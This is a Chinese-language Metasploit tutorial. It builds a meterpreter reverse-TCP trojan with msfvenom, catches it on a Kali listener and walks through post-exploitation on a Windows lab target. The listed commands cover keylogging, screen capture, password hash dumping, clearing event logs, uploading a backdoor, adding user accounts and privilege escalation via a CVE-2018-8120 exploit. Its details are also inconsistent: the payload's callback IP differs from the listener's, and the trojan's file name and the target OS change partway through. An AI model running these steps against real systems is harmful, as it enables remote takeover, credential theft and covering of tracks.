原理:
利用msf模块中的msfvenom模块,首先生成.exe木马文件,用测试机打开,攻击成功后,就渗透到了靶机系统中。
准备:
目标:win7 x64专业版
攻击主机:Kali IP:192.168.1.143
生成:
生成test.exe木马文件
Step1:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.110 LPORT=12345 -f exe > /root/test.exe
使用:
Step1:输入msfconsole进入metasploit
Step2:进入监听模块
Use exploit/multi/handler
Step3:设置payload反弹
Set payload windows/meterpreter/reverse_tcp
Step4:设置LHOST、LPORT参数
set LHOST 192.168.1.143(要监听的本地IP)
set LPORT 12345(要监听本地端口)
Step5:exploit攻击开始
Step6:把生成的木马文件hacker.exe拷贝到靶机WinXP系统中
在测试机中运行该exe文件,回到kali
出现该界面,表示渗透成功,可以对测试机进行一波操作了。
meterpreter下的命令:
getwd 当前目录
dir 查看所有文件
cat c:\123.txt 查看文件123.txt内容(数据是字符串传递,所以加一个转义字符\)
search -f cmd.exe (搜索名为cmd.exe文件所在目录)
upload /root/桌面/backldoor.exe(要上传的文件) -> c:\(上传到的目录) 上传文件
download c:\123txt /root 下载文件
clearev 清除日志
getuid 当前用户
ps 查看所用进程
kill 杀死某个进程
sysinfo 系统信息
键盘记录
keyscan_start 开始键盘记录
keyscan_dump 查看结果
keyscan_stop
屏幕截图
screenshot
屏幕监控
run vnc
获取密文密码
hashdump
shell
获取shell,进入cmd
cmd下(测试机是windows):
dir:显示所有文件
cd:切换目录
whoami 查看当前用户级别
net user 查看用户列表
net user 用户名 密码 /add 添加用户
net user 用户名 密码 更改用户密码
演示一下上传漏洞实现本地提权
CVE-2018-8120.exe (漏洞目录在kali的/root/CVE-2018-8120.exe)
出现了乱码现象,这是编码的问题,在编辑->首选项->兼容性->修改编码—>改成中文的GB2312退出再次shell
CVE-2018-8120.exe ‘whoami’ 运行,有些机子可以,有些不可以。